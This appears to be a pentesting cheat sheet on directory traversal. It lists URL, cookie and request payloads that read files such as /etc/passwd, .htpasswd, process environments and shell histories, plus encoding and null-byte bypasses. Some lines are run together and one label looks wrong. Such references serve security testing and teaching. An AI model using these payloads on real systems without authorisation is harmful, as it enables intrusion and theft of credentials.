A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing “traverse to parent directory” are passed through to the file APIs.
Directory traversal is a subset of Local File Inclusion (LFI). See difference.
- Testing Directory Traversal/File Include (WSTG-ATHZ-01)
- Root-me – Web Server – Directory Traversal (Protected)
- Directory traversal attack (Wikipedia)
💡 See labs WebSecurityAcademy (PortSwigger) – Directory Traversal.
➡ Vulnerability description for reporting available in VulnDB (GitHub)
Examples
Windows
http://someurl.com?filename=..\..\..\windows\win.inic:\boot.ini
c:\windows\system32\drivers\etc\hosts
C:\xampp\apache\.htpasswdUnix
http://someurl.com/../../../../etc/passwdIn HTTP GET request
GET /static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1Get environment variables of the current process
http://someurl.com/../../../../proc/self/environ
http://someurl.com/image?id=../proc/self/environOperating system details of the victim
http://someurl.com/../../../../proc/versionCurrent user
http://someurl.com/../../../../proc/self/versionOther info, like processes running
http://someurl.com/../../../../proc/sched_debugCommand history
http://someurl.com/../../../../home/<userid>/.bash_history
http://someurl.com/../../../../home/apache/.bash_historyIn cookies
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwdIn sudo
sudo chown baduser /opt/myapp/myconfig/../../../etc/passwd)Bypass
💡 See Local File Inclusion (LFI) / Remote File Inclusion (RFI) for other bypass ideas.
URI encoded
%2e%2e%2f which translates to ../
%2e%2e/ which translates to ../
..%2f which translates to ../
%2e%2e%5c which translates to ..\Validation on start of path
The application expects the filename to start with the base folder, such as /var/www/images.
filename=/var/www/images/../../../etc/passwdFile extension is validated
The application expects the filename to end with a specific file extension (e.g. “.png”). Try the null byte.
filename=../../../etc/passwd%00.png